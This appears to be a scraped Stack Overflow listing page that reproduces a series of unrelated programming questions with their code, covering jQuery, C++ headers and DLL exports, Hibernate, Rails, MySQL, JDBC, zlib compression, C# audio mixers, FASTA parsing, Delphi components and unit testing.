stackoverflow answer - Page 633

appendTo() inside $.each in jquery seems to cause flicker....

- by Pandiya Chendur

appendTo() causes flicker when it is inside $.each.... $.each(jsob.Table, function(i, employee) { $('<div class="resultsdiv"> ' + employee.Emp_Name + 'Category : ' + employee.Desig_Name + ' Salary Basis : ' + employee.SalaryBasis + 'Salary : ' + employee.FixedSalary + 'Address : ' + employee.Address + '</div>').appendTo('#ResultsDiv'); }); Right now i am appending every new div to #ResultsDiv inside$.each is it good/bad to do so... If it is bad What can be done to make my divs appendTo() after the loop so that i it wont flicker.... EDIT:(based on answer) var divs = ''; $.each(jsob.Table, function(i, employee) { divs += '<div class="resultsdiv"> ' + employee.Emp_Name + 'Category : ' + employee.Desig_Name + ' Salary Basis : ' + employee.SalaryBasis + 'Salary : ' + employee.FixedSalary + 'Address : ' + employee.Address + '</div>'; }); $("#ResultsDiv").append(divs); But that too doesn't stop the flicker...

Read the article

C++ Undeclared Identifier (but it is declared?)

- by Joshua

I'm pretty sure I've included the qanda class, but when I try to declare a vector that contains it or a class of that type I get an error saying that qanda is undefined. Any idea what the problem might be? bot_manager_item.h #pragma once #include "../bot_packet/bot_packet.h" #include <vector> class bot_manager_item; #include "qanda.h" #include "bot_manager.h" class bot_manager_item { public: bot_manager_item(bot_manager* mngr, const char* name, const char* work_dir); ~bot_manager_item(); bool startup(); void cleanup(); void on_push_event(bot_exchange_format f); bool disable; private: void apply_changes(); bot_manager *_mngr; std::string _name; std::string _work_dir; std::string _message; std::string _message_copy; std::vector<qanda> games; qanda test; char _config_full_path[2600]; }; qanda.h #ifndef Q_AND_A #define Q_AND_A #include "users.h" #include "..\bot_packet\bot_packet.h" #include "bot_manager.h" #include <string> #include <algorithm> #include <map> #include <vector> #include <fstream> class qanda { public: qanda(bot_manager * manager, std::string name, std::string directory); ~qanda(){}; void room_message(std::string username, std::string user_message); void timer_tick(); private: // data members std::string question; std::string answer; std::string directory; std::string command_prefix; std::string name; Users users; std::map <std::string, std::string> questions_and_answers; int time_per_question; // seconds int time_between_questions; // seconds int timer; // milliseconds bool is_delayed; bool is_playing; bot_manager * manager; // functions void new_question(); void send_message(std::string msg); void announce_question(); void load_questions(); }; #endif

Read the article

Good design of mapping Java Domain objects to Tables (using Hibernate)

- by M. McKenzie

Hey guys, I have a question that is more in the realm of design, than implementation. I'm also happy for anyone to point out resources for the answer and I'll gladly, research for myself. Highly simplified Java and SQL: Say I have a business domain POJO called 'Picture' with three attributes. class Picture int idPicture String fileName long size Say I have another business domain POJO called "Item" with 3 attributes Class Item int idItem String itemName ArrayList itemPictures These would be a normal simple relationship. You could say that 'Picture' object, will never exist outside an 'Item' object. Assume a picture belongs only to a specific item, but that an item can have multiple pictures Now - using good database design (3rd Normal Form), we know that we should put items and pictures in their own tables. Here is what I assume would be correct. table Item int idItem (primary key) String itemName table Picture int idPicture (primary key) varchar(45) fileName long size int idItem (foreign key) Here is my question: If you are making Hibernate mapping files for these objects. In the data design, your Picture table needs a column to refer to the Item, so that a foreign key relation can be maintained. However,in your business domain objects - your Picture does not hold a reference/attribute to the idItem - and does not need to know it. A java Picture instance is always instantiated inside an Item instance. If you want to know the Item that the Picture belongs to you are already in the correct scope. Call myItem.getIdItem() and myItem.getItemPictures(),and you have the two pieces of information you need. I know that Hibernate tools have a generator that can auto make your POJO's from looking at your database. My problem stems from the fact that I planned out the data design for this experiment/project first. Then when I went to make the domain java objects, I realized that good design dictated that the objects hold other objects in a nested way. This is obviously different from the way that a database schema is - where all objects(tables) are flat and hold no other complex types within them. What is a good way to reconcile this? Would you: (A) Make the hibernate mapping files so that Picture.hbm.xml has a mapping to the POJO parent's idItem Field (if it's even possible) (B) Add an int attribute in the Picture class to refer to the idItem and set it at instantiation, thus simplifying the hbm.xml mapping file by having all table fields as local attributes in the class (C) Fix the database design because it is wrong, dork. I'd truly appreciate any feedback

Read the article

Replace conditional with polymorphism refactoring or similar?

- by Anders Svensson

Hi, I have tried to ask a variant of this question before. I got some helpful answers, but still nothing that felt quite right to me. It seems to me this shouldn't really be that hard a nut to crack, but I'm not able to find an elegant simple solution. (Here's my previous post, but please try to look at the problem stated here as procedural code first so as not to be influenced by the earlier explanation which seemed to lead to very complicated solutions: http://stackoverflow.com/questions/2772858/design-pattern-for-cost-calculator-app ) Basically, the problem is to create a calculator for hours needed for projects that can contain a number of services. In this case "writing" and "analysis". The hours are calculated differently for the different services: writing is calculated by multiplying a "per product" hour rate with the number of products, and the more products are included in the project, the lower the hour rate is, but the total number of hours is accumulated progressively (i.e. for a medium-sized project you take both the small range pricing and then add the medium range pricing up to the number of actual products). Whereas for analysis it's much simpler, it is just a bulk rate for each size range. How would you be able to refactor this into an elegant and preferably simple object-oriented version (please note that I would never write it like this in a purely procedural manner, this is just to show the problem in another way succinctly). I have been thinking in terms of factory, strategy and decorator patterns, but can't get any to work well. (I read Head First Design Patterns a while back, and both the decorator and factory patterns described have some similarities to this problem, but I have trouble seeing them as good solutions as stated there. The decorator example seems very complicated for just adding condiments, but maybe it could work better here, I don't know. And the factory pattern example with the pizza factory...well it just seems to create such a ridiculous explosion of classes, at least in their example. I have found good use for factory patterns before, but I can't see how I could use it here without getting a really complicated set of classes) The main goal would be to only have to change in one place (loose coupling etc) if I were to add a new parameter (say another size, like XSMALL, and/or another service, like "Administration"). Here's the procedural code example: public class Conditional { private int _numberOfManuals; private string _serviceType; private const int SMALL = 2; private const int MEDIUM = 8; public int GetHours() { if (_numberOfManuals <= SMALL) { if (_serviceType == "writing") return 30 * _numberOfManuals; if (_serviceType == "analysis") return 10; } else if (_numberOfManuals <= MEDIUM) { if (_serviceType == "writing") return (SMALL * 30) + (20 * _numberOfManuals - SMALL); if (_serviceType == "analysis") return 20; } else //i.e. LARGE { if (_serviceType == "writing") return (SMALL * 30) + (20 * (MEDIUM - SMALL)) + (10 * _numberOfManuals - MEDIUM); if (_serviceType == "analysis") return 30; } return 0; //Just a default fallback for this contrived example } } All replies are appreciated! I hope someone has a really elegant solution to this problem that I actually thought from the beginning would be really simple... Regards, Anders

Read the article

To Interface or Not?: Creating a polymorphic model relationship in Ruby on Rails dynamically..

- by Globalkeith

Please bear with me for a moment as I try to explain exactly what I would like to achieve. In my Ruby on Rails application I have a model called Page. It represents a web page. I would like to enable the user to arbitrarily attach components to the page. Some examples of "components" would be Picture, PictureCollection, Video, VideoCollection, Background, Audio, Form, Comments. Currently I have a direct relationship between Page and Picture like this: class Page < ActiveRecord::Base has_many :pictures, :as => :imageable, :dependent => :destroy end class Picture < ActiveRecord::Base belongs_to :imageable, :polymorphic => true end This relationship enables the user to associate an arbitrary number of Pictures to the page. Now if I want to provide multiple collections i would need an additional model: class PictureCollection < ActiveRecord::Base belongs_to :collectionable, :polymorphic => true has_many :pictures, :as => :imageable, :dependent => :destroy end And alter Page to reference the new model: class Page < ActiveRecord::Base has_many :picture_collections, :as => :collectionable, :dependent => :destroy end Now it would be possible for the user to add any number of image collections to the page. However this is still very static in term of the :picture_collections reference in the Page model. If I add another "component", for example :video_collections, I would need to declare another reference in page for that component type. So my question is this: Do I need to add a new reference for each component type, or is there some other way? In Actionscript/Java I would declare an interface Component and make all components implement that interface, then I could just have a single attribute :components which contains all of the dynamically associated model objects. This is Rails, and I'm sure there is a great way to achieve this, but its a tricky one to Google. Perhaps you good people have some wise suggestions. Thanks in advance for taking the time to read and answer this.

Read the article

MySQL - Calculating fields on the fly vs storing calculated data

- by Christian Varga

Hi Everyone, I apologise if this has been asked before, but I can't seem to find an answer to a question that I have about calculating on the fly vs storing fields in a database. I read a few articles that suggested it was preferable to calculate when you can, but I would just like to know if that still applies to the following 2 examples. Example 1. Say you are storing data relating to a car. You store the fuel tank size in litres, and how many litres it uses per 100km. You also want to know how many KMs it can travel, which can be calculated from the tank size and economy. I see 2 ways of doing this: When a car is added or updated, calculate the amount of KMs and store this as a static field in the database. Every time a car is accessed, calculate the amount of KMs on the fly. Because the cars economy/tank size doesn't change (although it could be edited), the KMs is a pretty static value. I don't see why we would calculate it every single time the car is accessed. Wouldn't this waste cpu time as opposed to simply storing it in a separate field in the database and calculating only when a car is added or updated? My next example, which is almost an entirely different question (but on the same topic), relates to counting children. Let's say we have a app which has categories and items. We have a view where we display all the categories, and a count of all the items inside each category. Again, I'm wondering what's better. To perform a MySQL query to count all the items in each category every single time the page is accessed? Or store the count in a field in the categories table and update when an item is added / deleted? I know it is redundant to store anything that can be calculated, but I worry that calculating fields or counting records might be slow as opposed to storing the data in a field. If it's not then please let me know, I just want to learn about when to use either method. On a small scale I guess it wouldn't matter either way, but apps like Facebook, would they really count the amount of friends you have every time someone views your profile or would they just store it as a field? I'd appreciate any responses to both of these scenarios, and any resource that might explain the benefits of calculating vs storing. Thanks in advance, Christian

Read the article

retrieving value from database in java

- by Akcire Atienza

I am making AGAIN another program that retrieves the inputted data/values of fields from the database I created. but this time, my inputted value will be coming from the JtextField I created. I wonder what's wrong in here bec when I'm running it the output is always null. in this program i will convert the inputted value of my JTextField into int. here it is: public class ButtonHandler implements ActionListener { public void actionPerformed(ActionEvent e) { if(e.getSource() == extendB) { ExtensionForm extend = new ExtensionForm(); extend.setVisible(true); } else if(e.getSource()== searchB) { //get text from the textField String guest = guestIDTF.getText(); //parse the string to integer for retrieving of data int id = Integer.parseInt(guest); GuestsInfo guestInfo = new GuestsInfo(id); Room roomInfo = new Room(id); String labels[] = {guestInfo.getFirstName()+" "+guestInfo.getLastName(),""+roomInfo.getRoomNo(),roomInfo.getRoomType(),guestInfo.getTime(),"11:00"}; for(int z = 0; z<labels.length; z++) { labelDisplay[z].setText(labels[z]); } in my second class it retrieves the inputted values of fields from the database I created here's the code: import java.sql.*; public class Room { private String roomType; private int guestID, roomNo; private Connection con; private PreparedStatement statement; public Room(){ try { Class.forName("com.mysql.jdbc.Driver"); con = DriverManager.getConnection( "jdbc:mysql://localhost:3306/3moronsdb","root",""); } catch (Exception e) { e.printStackTrace(); } } public Room(int guestsID) { this(); try{ statement = con.prepareStatement("SELECT * FROM guest WHERE guestID=?"); statement.setInt(1, guestID); ResultSet rs = statement.executeQuery(); while(rs.next()){ this.guestID = rs.getInt(1); this.roomType = rs.getString(2); this.roomNo = rs.getInt(3); } }catch(Exception e){ System.out.print(e); } } //Constructor for setting rate public Room(String roomType, int roomNo) { this(); try { statement = con.prepareStatement("Insert into room(roomType, roomNo) values(?,?)"); statement.setString(1, roomType); statement.setInt(2, roomNo); statement.executeUpdate(); } catch(Exception e) { e.printStackTrace(); return; } } //getting roomType public String getRoomType(){ return roomType; } //getting roomNo public int getRoomNo(){ return roomNo; } //getting guestID public int getGuestId(){ return guestID; } } i already insert some values in my 3moronsdb which are ( 1, Classic , 103). here's my TEST main class: public class TestMain { public static void main(String [] a){ GuestsInfo guest = new GuestsInfo(1); //note that this instantiation is the other class which i just ask the other day.. (http://stackoverflow.com/questions/12762835/retrieving-values-from-database-in-java) Room rum = new Room(1); System.out.print(rum.getRoomType()+" "+ guest.getFirstName()); } } when i'm running it it only gives me null output for the Room class but i am getting the output of the GuestsInfo class which is 'Ericka'. Can you help me guys? I know I ask this kind of problem yesterday but i really don't know what's wrong in here now..

Read the article

Internet Explorer 8 + Deflate

- by Andreas Bonini

I have a very weird problem.. I really do hope someone has an answer because I wouldn't know where else to ask. I am writing a cgi application in C++ which is executed by Apache and outputs HTML code. I am compressing the HTML output myself - from within my C++ application - since my web host doesn't support mod_deflate for some reason. I tested this with Firefox 2, Firefox 3, Opera 9, Opera 10, Google Chrome, Safari, IE6, IE7, IE8, even wget.. It works with ANYTHING except IE8. IE8 just says "Internet Explorer cannot display the webpage", with no information whatsoever. I know it's because of the compression only because it works if I disable it. Do you know what I'm doing wrong? I use zlib to compress it, and the exact code is: /* Compress it */ int compressed_output_size = content.length() + (content.length() * 0.2) + 16; char *compressed_output = (char *)Alloc(compressed_output_size); int compressed_output_length; Compress(compressed_output, compressed_output_size, (void *)content.c_str(), content.length(), &compressed_output_length); /* Send the compressed header */ cout << "Content-Encoding: deflate\r\n"; cout << boost::format("Content-Length: %d\r\n") % compressed_output_length; cgiHeaderContentType("text/html"); cout.write(compressed_output, compressed_output_length); static void Compress(void *to, size_t to_size, void *from, size_t from_size, int *final_size) { int ret; z_stream stream; stream.zalloc = Z_NULL; stream.zfree = Z_NULL; stream.opaque = Z_NULL; if ((ret = deflateInit(&stream, CompressionSpeed)) != Z_OK) COMPRESSION_ERROR("deflateInit() failed: %d", ret); stream.next_out = (Bytef *)to; stream.avail_out = (uInt)to_size; stream.next_in = (Bytef *)from; stream.avail_in = (uInt)from_size; if ((ret = deflate(&stream, Z_NO_FLUSH)) != Z_OK) COMPRESSION_ERROR("deflate() failed: %d", ret); if (stream.avail_in != 0) COMPRESSION_ERROR("stream.avail_in is not 0 (it's %d)", stream.avail_in); if ((ret = deflate(&stream, Z_FINISH)) != Z_STREAM_END) COMPRESSION_ERROR("deflate() failed: %d", ret); if ((ret = deflateEnd(&stream)) != Z_OK) COMPRESSION_ERROR("deflateEnd() failed: %d", ret); if (final_size) *final_size = stream.total_out; return; }

Read the article

Reconciling a new BindingList into a master BindingList using LINQ

- by Neo

I have a seemingly simple problem whereby I wish to reconcile two lists so that an 'old' master list is updated by a 'new' list containing updated elements. Elements are denoted by a key property. These are my requirements: All elements in either list that have the same key results in an assignment of that element from the 'new' list over the original element in the 'old' list only if any properties have changed. Any elements in the 'new' list that have keys not in the 'old' list will be added to the 'old' list. Any elements in the 'old' list that have keys not in the 'new' list will be removed from the 'old' list. I found an equivalent problem here - http://stackoverflow.com/questions/161432/ - but it hasn't really been answered properly. So, I came up with an algorithm to iterate through the old and new lists and perform the reconciliation as per the above. Before anyone asks why I'm not just replacing the old list object with the new list object in its entirety, it's for presentation purposes - this is a BindingList bound to a grid on a GUI and I need to prevent refresh artifacts such as blinking, scrollbars moving, etc. So the list object must remain the same, only its updated elements changed. Another thing to note is that the objects in the 'new' list, even if the key is the same and all the properties are the same, are completely different instances to the equivalent objects in the 'old' list, so copying references is not an option. Below is what I've come up with so far - it's a generic extension method for a BindingList. I've put comments in to demonstrate what I'm trying to do. public static class BindingListExtension { public static void Reconcile<T>(this BindingList<T> left, BindingList<T> right, string key) { PropertyInfo piKey = typeof(T).GetProperty(key); // Go through each item in the new list in order to find all updated and new elements foreach (T newObj in right) { // First, find an object in the new list that shares its key with an object in the old list T oldObj = left.First(call => piKey.GetValue(call, null).Equals(piKey.GetValue(newObj, null))); if (oldObj != null) { // An object in each list was found with the same key, so now check to see if any properties have changed and // if any have, then assign the object from the new list over the top of the equivalent element in the old list foreach (PropertyInfo pi in typeof(T).GetProperties()) { if (!pi.GetValue(oldObj, null).Equals(pi.GetValue(newObj, null))) { left[left.IndexOf(oldObj)] = newObj; break; } } } else { // The object in the new list is brand new (has a new key), so add it to the old list left.Add(newObj); } } // Now, go through each item in the old list to find all elements with keys no longer in the new list foreach (T oldObj in left) { // Look for an element in the new list with a key matching an element in the old list if (right.First(call => piKey.GetValue(call, null).Equals(piKey.GetValue(oldObj, null))) == null) { // A matching element cannot be found in the new list, so remove the item from the old list left.Remove(oldObj); } } } } It can be called like this: _oldBindingList.Reconcile(newBindingList, "MyKey") However, I'm looking for perhaps a method of doing the same using LINQ type methods such as GroupJoin<, Join<, Select<, SelectMany<, Intersect<, etc. So far, the problem I've had is that each of these LINQ type methods result in brand new intermediary lists (as a return value) and really, I only want to modify the existing list for all the above reasons. If anyone can help with this, would be most appreciated. If not, no worries, the above method (as it were) will suffice for now. Thanks, Jason

Read the article

How to adjust microphone gain from C# (needs to work on XP & W7)...

- by Ed

First, note that I know there are a few questions like this already posted; however they don't seem to address the problem adequately. I have a C# application, with all the pInvoke hooks to talk to the waveXXX API, and I'm able to do capture and play back of audio with that. I'm also able to adjust speaker (WaveOut) volume with that API. The problem is that for whatever reason, that API does not allow me to adjust microphone (WaveIn) volume. So, I managed to find some mixer code that I've also pulled in and access through pInvoke and that allows me to adjust microphone volume, but only on my W7 PC. The mixer code I started with comes from here: http://social.msdn.microsoft.com/Forums/en-US/isvvba/thread/05dc2d35-1d45-4837-8e16-562ee919da85 and it works, but is written to adjust speaker volume. I added the SetMicVolume method shown here... public static void SetMicVolume(int mxid, int percentage) { bool rc; int mixer, vVolume; MIXERCONTROL volCtrl = new MIXERCONTROL(); int currentVol; mixerOpen(out mixer, mxid, 0, 0, MIXER_OBJECTF_WAVEIN); int type = MIXERCONTROL_CONTROLTYPE_VOLUME; rc = GetVolumeControl(mixer, MIXERLINE_COMPONENTTYPE_SRC_MICROPHONE, type, out volCtrl, out currentVol); if (rc == false) { mixerClose(mixer); mixerOpen(out mixer, 0, 0, 0, 0); rc = GetVolumeControl(mixer, MIXERLINE_COMPONENTTYPE_SRC_MICROPHONE, type, out volCtrl, out currentVol); if (rc == false) throw new Exception("SetMicVolume/GetVolumeControl() failed"); } vVolume = ((int)((float)(volCtrl.lMaximum - volCtrl.lMinimum) / 100.0F) * percentage); rc = SetVolumeControl(mixer, volCtrl, vVolume); if (rc == false) throw new Exception("SetMicVolume/SetVolumeControl() failed"); mixerClose(mixer); } Note the "second attempt" to call GetVolumeControl(). This is done because on XP, in the first call to GetVolumeControl (refer to site above for that code), the call to mixerGetLineControlsA() fails with XP systems returning MIXERR_INVALCONTROL. Then, with this second attempt using mixerOpen(out mixer, 0, 0, 0, 0), the code doesn't return a failure but the mic gain is unaffected. Note, as I said above, this works on W7 (the second attempt is never executed because it doesn't fail using mixerOpen(out mixer, mxid, 0, 0, MIXER_OBJECTF_WAVEIN)). I admit to not having a good grasp on the mixer API, so that's what I'm looking into now; however if anyone has a clue why this would work on W7, but not XP, I'd sure like to hear it. Meanwhile, if I figure it out before I get a response, I'll post my own answer...

Read the article

Making Visual C++ DLL from C++ class

- by prosseek

I have the following C++ code to make dll (Visual Studio 2010). class Shape { public: Shape() { nshapes++; } virtual ~Shape() { nshapes--; }; double x, y; void move(double dx, double dy); virtual double area(void) = 0; virtual double perimeter(void) = 0; static int nshapes; }; class __declspec(dllexport) Circle : public Shape { private: double radius; public: Circle(double r) : radius(r) { }; virtual double area(void); virtual double perimeter(void); }; class __declspec(dllexport) Square : public Shape { private: double width; public: Square(double w) : width(w) { }; virtual double area(void); virtual double perimeter(void); }; I have the __declspec, class __declspec(dllexport) Circle I could build a dll with the following command CL.exe /c example.cxx link.exe /OUT:"example.dll" /DLL example.obj When I tried to use the library, Square* square; square->area() I got the error messages. What's wrong or missing? example_unittest.obj : error LNK2001: unresolved external symbol "public: virtual double __thiscall ... Square::area(void)" (?area@Square@@UAENXZ) ADDED Following wengseng's answer, I modified the header file, and for DLL C++ code, I added #define XYZLIBRARY_EXPORT However, I still got errors. example_unittest.obj : error LNK2019: unresolved external symbol "__declspec(dllimport) public: __th iscall Circle::Circle(double)" (__imp_??0Circle@@QAE@N@Z) referenced in function "protected: virtual void __thiscall TestOne::SetUp(void)" (?SetUp@TestOne@@MAEXXZ) example_unittest.obj : error LNK2019: unresolved external symbol "__declspec(dllimport) public: __th iscall Square::Square(double)" (__imp_??0Square@@QAE@N@Z) referenced in function "protected: virtual void __thiscall TestOne::SetUp(void)" (?SetUp@TestOne@@MAEXXZ) example_unittest.obj : error LNK2001: unresolved external symbol "public: virtual double __thiscall Square::area(void)" (?area@Square@@UAENXZ) example_unittest.obj : error LNK2001: unresolved external symbol "public: virtual double __thiscall Square::perimeter(void)" (?perimeter@Square@@UAENXZ) example_unittest.obj : error LNK2001: unresolved external symbol "public: virtual double __thiscall Circle::area(void)" (?area@Circle@@UAENXZ) example_unittest.obj : error LNK2001: unresolved external symbol "public: virtual double __thiscall Circle::perimeter(void)" (?perimeter@Circle@@UAENXZ)

Read the article

Efficient file buffering & scanning methods for large files in python

- by eblume

The description of the problem I am having is a bit complicated, and I will err on the side of providing more complete information. For the impatient, here is the briefest way I can summarize it: What is the fastest (least execution time) way to split a text file in to ALL (overlapping) substrings of size N (bound N, eg 36) while throwing out newline characters. I am writing a module which parses files in the FASTA ascii-based genome format. These files comprise what is known as the 'hg18' human reference genome, which you can download from the UCSC genome browser (go slugs!) if you like. As you will notice, the genome files are composed of chr[1..22].fa and chr[XY].fa, as well as a set of other small files which are not used in this module. Several modules already exist for parsing FASTA files, such as BioPython's SeqIO. (Sorry, I'd post a link, but I don't have the points to do so yet.) Unfortunately, every module I've been able to find doesn't do the specific operation I am trying to do. My module needs to split the genome data ('CAGTACGTCAGACTATACGGAGCTA' could be a line, for instance) in to every single overlapping N-length substring. Let me give an example using a very small file (the actual chromosome files are between 355 and 20 million characters long) and N=8 import cStringIO example_file = cStringIO.StringIO("""\ header CAGTcag TFgcACF """) for read in parse(example_file): ... print read ... CAGTCAGTF AGTCAGTFG GTCAGTFGC TCAGTFGCA CAGTFGCAC AGTFGCACF The function that I found had the absolute best performance from the methods I could think of is this: def parse(file): size = 8 # of course in my code this is a function argument file.readline() # skip past the header buffer = '' for line in file: buffer += line.rstrip().upper() while len(buffer) = size: yield buffer[:size] buffer = buffer[1:] This works, but unfortunately it still takes about 1.5 hours (see note below) to parse the human genome this way. Perhaps this is the very best I am going to see with this method (a complete code refactor might be in order, but I'd like to avoid it as this approach has some very specific advantages in other areas of the code), but I thought I would turn this over to the community. Thanks! Note, this time includes a lot of extra calculation, such as computing the opposing strand read and doing hashtable lookups on a hash of approximately 5G in size. Post-answer conclusion: It turns out that using fileobj.read() and then manipulating the resulting string (string.replace(), etc.) took relatively little time and memory compared to the remainder of the program, and so I used that approach. Thanks everyone!

Read the article

C++ string sort like a human being?

- by Walter Nissen

I would like to sort alphanumeric strings the way a human being would sort them. I.e., "A2" comes before "A10", and "a" certainly comes before "Z"! Is there any way to do with without writing a mini-parser? Ideally it would also put "A1B1" before "A1B10". I see the question "Natural (human alpha-numeric) sort in Microsoft SQL 2005" with a possible answer, but it uses various library functions, as does "Sorting Strings for Humans with IComparer". Below is a test case that currently fails: #include <set> #include <iterator> #include <iostream> #include <vector> #include <cassert> template <typename T> struct LexicographicSort { inline bool operator() (const T& lhs, const T& rhs) const{ std::ostringstream s1,s2; s1 << toLower(lhs); s2 << toLower(rhs); bool less = s1.str() < s2.str(); std::cout<<s1.str()<<" "<<s2.str()<<" "<<less<<"\n"; return less; } inline std::string toLower(const std::string& str) const { std::string newString(""); for (std::string::const_iterator charIt = str.begin(); charIt!=str.end();++charIt) { newString.push_back(std::tolower(*charIt)); } return newString; } }; int main(void) { const std::string reference[5] = {"ab","B","c1","c2","c10"}; std::vector<std::string> referenceStrings(&(reference[0]), &(reference[5])); //Insert in reverse order so we know they get sorted std::set<std::string,LexicographicSort<std::string> > strings(referenceStrings.rbegin(), referenceStrings.rend()); std::cout<<"Items:\n"; std::copy(strings.begin(), strings.end(), std::ostream_iterator<std::string>(std::cout, "\n")); std::vector<std::string> sortedStrings(strings.begin(), strings.end()); assert(sortedStrings == referenceStrings); }

Read the article

How to override loading a TImage from the object inspector (at run-time)?

- by Mawg

Further to my previous question, which did not get a useful answer despite a bounty, I will try rephrasing the question. Basically, when the user clicks the ellipsis in the object inspector, Delphi opens a file/open dialog. I want to replace this handling with my own, so that I can save the image's path. I would have expected that all I need to do is to derive a class from TImage and override the Assign() function, as in the following code. However, when I do the assign function is never called. So, it looks like I need to override something else, but what? unit my_Image; interface uses Classes, ExtCtrls, Jpeg, Graphics; type Tmy_Image = class(Timage) private FPicture : TPicture; protected procedure OnChange(Sender: TObject); public { Public declarations } Constructor Create(AOwner: TComponent); override; procedure SetPicture(picture : TPicture); procedure Assign(Source: TPersistent); override; published { Published declarations - available in the Object Inspector at design-time } property Picture : TPicture read FPicture write SetPicture; end; // of class Tmy_Image() procedure Register; implementation uses Controls, Dialogs; procedure Register; begin RegisterComponents('Standard', [Tmy_Image]); end; Constructor Tmy_Image.Create(AOwner: TComponent); begin inherited; // Call the parent Create method Hint := 'Add an image from a file|Add an image from a file'; // Tooltip | status bar text AutoSize := True; // Control resizes when contents change (new image is loaded) Height := 104; Width := 104; FPicture := TPicture.Create(); self.Picture.Bitmap.LoadFromResourceName(hInstance, 'picture_poperty_bmp'); end; procedure Tmy_Image.OnChange(Sender: TObject); begin Constraints.MaxHeight := Picture.Height; Constraints.MaxWidth := Picture.Width; Self.Height := Picture.Height; Self.Width := Picture.Width; end; procedure Tmy_Image.SetPicture(picture : TPicture); begin MessageDlg('Tmy_Image.SetPicture', mtWarning, [mbOK], 0); // never called end; procedure Tmy_Image.Assign(Source: TPersistent); begin MessageDlg('Tmy_Image.Assign', mtWarning, [mbOK], 0); // never called end; end.

Read the article

How do you unit test the real world?

- by Kim Sun-wu

I'm primarily a C++ coder, and thus far, have managed without really writing tests for all of my code. I've decided this is a Bad Idea(tm), after adding new features that subtly broke old features, or, depending on how you wish to look at it, introduced some new "features" of their own. But, unit testing seems to be an extremely brittle mechanism. You can test for something in "perfect" conditions, but you don't get to see how your code performs when stuff breaks. A for instance is a crawler, let's say it crawls a few specific sites, for data X. Do you simply save sample pages, test against those, and hope that the sites never change? This would work fine as regression tests, but, what sort of tests would you write to constantly check those sites live and let you know when the application isn't doing it's job because the site changed something, that now causes your application to crash? Wouldn't you want your test suite to monitor the intent of the code? The above example is a bit contrived, and something I haven't run into (in case you haven't guessed). Let me pick something I have, though. How do you test an application will do its job in the face of a degraded network stack? That is, say you have a moderate amount of packet loss, for one reason or the other, and you have a function DoSomethingOverTheNetwork() which is supposed to degrade gracefully when the stack isn't performing as it's supposed to; but does it? The developer tests it personally by purposely setting up a gateway that drops packets to simulate a bad network when he first writes it. A few months later, someone checks in some code that modifies something subtly, so the degradation isn't detected in time, or, the application doesn't even recognize the degradation, this is never caught, because you can't run real world tests like this using unit tests, can you? Further, how about file corruption? Let's say you're storing a list of servers in a file, and the checksum looks okay, but the data isn't really. You want the code to handle that, you write some code that you think does that. How do you test that it does exactly that for the life of the application? Can you? Hence, brittleness. Unit tests seem to test the code only in perfect conditions(and this is promoted, with mock objects and such), not what they'll face in the wild. Don't get me wrong, I think unit tests are great, but a test suite composed only of them seems to be a smart way to introduce subtle bugs in your code while feeling overconfident about it's reliability. How do I address the above situations? If unit tests aren't the answer, what is? Thanks!

Read the article

Blit Queue Optimization Algorithm

- by martona

I'm looking to implement a module that manages a blit queue. There's a single surface, and portions of this surface (bounded by rectangles) are copied to elsewhere within the surface: add_blt(rect src, point dst); There can be any number of operations posted, in order, to the queue. Eventually the user of the queue will stop posting blits, and ask for an optimal set of operations to actually perform on the surface. The task of the module is to ensure that no pixel is copied unnecessarily. This gets tricky because of overlaps of course. A blit could re-blit a previously copied pixel. Ideally blit operations would be subdivided in the optimization phase in such a way that every block goes to its final place with a single operation. It's tricky but not impossible to put this together. I'm just trying to not reinvent the wheel. I looked around on the 'net, and the only thing I found was the SDL_BlitPool Library which assumes that the source surface differs from the destination. It also does a lot of grunt work, seemingly unnecessarily: regions and similar building blocks are a given. I'm looking for something higher-level. Of course, I'm not going to look a gift horse in the mouth, and I also don't mind doing actual work... If someone can come forward with a basic idea that makes this problem seem less complex than it does right now, that'd be awesome too. EDIT: Thinking about aaronasterling's answer... could this work? Implement customized region handler code that can maintain metadata for every rectangle it contains. When the region handler splits up a rectangle, it will automatically associate the metadata of this rectangle with the resulting sub-rectangles. When the optimization run starts, create an empty region handled by the above customized code, call this the master region Iterate through the blt queue, and for every entry: Let srcrect be the source rectangle for the blt beng examined Get the intersection of srcrect and master region into temp region Remove temp region from master region, so master region no longer covers temp region Promote srcrect to a region (srcrgn) and subtract temp region from it Offset temp region and srcrgn with the vector of the current blt: their union will cover the destination area of the current blt Add to master region all rects in temp region, retaining the original source metadata (step one of adding the current blt to the master region) Add to master region all rects in srcrgn, adding the source information for the current blt (step two of adding the current blt to the master region) Optimize master region by checking if adjacent sub-rectangles that are merge candidates have the same metadata. Two sub-rectangles are merge candidates if (r1.x1 == r2.x1 && r1.x2 == r2.x2) | (r1.y1 == r2.y1 && r1.y2 == r2.y2). If yes, combine them. Enumerate master region's sub-rectangles. Every rectangle returned is an optimized blt operation destination. The associated metadata is the blt operation`s source.

Read the article

Javascript in address bar, how do I decipher?

- by DoMx

